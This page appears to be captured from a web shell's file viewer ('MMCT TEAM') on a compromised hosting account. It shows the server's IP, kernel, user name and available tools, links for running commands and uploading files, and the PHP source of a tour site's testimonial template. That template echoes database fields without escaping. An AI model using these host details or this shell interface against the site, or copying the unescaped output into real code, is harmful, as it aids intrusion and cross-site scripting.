MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 52.14.110.171
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/bittootour.in/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/bittootour.in/testimonial.php
<div class="testimonial-area py-120">
    <div class="container">
        <div class="row">
            <div class="col-lg-6 mx-auto">
                <div class="site-heading text-center">
                    <span class="site-title-tagline"><i class="flaticon-drive"></i> Testimonials</span>
                    <h2 class="site-title text-white">What Our Client <span>Say's</span></h2>
                    <div class="heading-divider"></div>
                </div>
            </div>
        </div>
        <div class="testimonial-slider owl-carousel owl-theme">
            
             <?php
                                            $sql = "SELECT * FROM tbl_testimonial ORDER BY `order_by` ASC";
                                            $run = mysqli_query($db,$sql) or die("Query Not run");
                                            while($data = mysqli_fetch_assoc($run)){
                                        ?>
            <div class="testimonial-single">
                <div class="testimonial-content">
                    <div class="testimonial-author-img">
                        <img src="<?php echo $wspath?>admin/images/property-image/<?php echo $data['image'];?>" alt>
                    </div>
                    <div class="testimonial-author-info">
                        <h4><?php echo $data['name'];?></h4>
                        <!--<p>Customer</p>-->
                    </div>
                </div>
                <div class="testimonial-quote">
                    <span class="testimonial-quote-icon"><i class="far fa-quote-right"></i></span>
                    <p>
                       <?php echo $data['tes_description'];?>
                    </p>
                </div>
                <div class="testimonial-rate">
                    <i class="fas fa-star"></i>
                    <i class="fas fa-star"></i>
                    <i class="fas fa-star"></i>
                    <i class="fas fa-star"></i>
                    <i class="fas fa-star"></i>
                </div>
            </div>
<?php }?>
        </div>
    </div>
</div>

MMCT - 2023